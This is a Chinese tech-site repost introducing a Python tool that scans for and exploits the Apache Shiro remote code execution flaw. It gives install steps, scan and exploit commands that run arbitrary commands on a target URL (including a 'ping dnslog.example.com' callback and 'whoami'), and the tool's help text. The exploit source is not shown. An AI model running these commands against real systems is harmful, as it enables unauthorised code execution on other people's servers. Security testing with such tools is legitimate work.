一个简单的Shiro RCE检测和利用脚本

菜鸟学安全 2024-01-09 321

电子说

1.2w人已加入

描述

0x01 工具介绍

一个简单的Shiro RCE检测和利用脚本。

0x02 安装与使用

1、安装需要的包

 

pip install -r requirements.txt

 

2、检查该漏洞

 

python ShiroRceTool.py -m scan -u "http://example.com"

 

3、执行命令 (不回显) 

 

python ShiroRceTool.py -m exploit -u "http://example.com" -c "ping dnslog.example.com"

 

4、执行命令(尝试回显)

 

python ShiroRceTool.py -m exploit -u "http://example.com" -c "whoami" -e

 

5、获取帮助 - Get help

 

python ShiroRceTool.py
 ____  _     _           ____         _____           _
/ ___|| |__ (_)_ __ ___ |  _  ___ __|_   _|__   ___ | |
\___ | '_ | | '__/ _ | |_) / __/ _ | |/ _  / _ | |
 ___) | | | | | | | (_) |  _ < (_|  __/| | (_) | (_) | |
|____/|_| |_|_|_|  \___/|_| _\___\___||_|\___/ \___/|_|


                        By: Hack3rHan


usage: ShiroRceTool.py [-h] [-m MODE] [-u URL] [-c CMD] [-e]


options:
  -h, --help            show this help message and exit
  -m MODE, --mode MODE  "exploit" or "scan".
  -u URL, --url URL     URL of the target.
  -c CMD, --cmd CMD     Command to execute.
  -e, --echo            Echo mode.

 

  审核编辑:汤梓红

打开APP阅读更多精彩内容
声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉

全部0条评论

快来发表一下你的评论吧 !

下载APP
|投诉反馈|电子发烧友网
© 2021 elecfans.com
湘ICP备2023018690号
×
20
完善资料,
赚取积分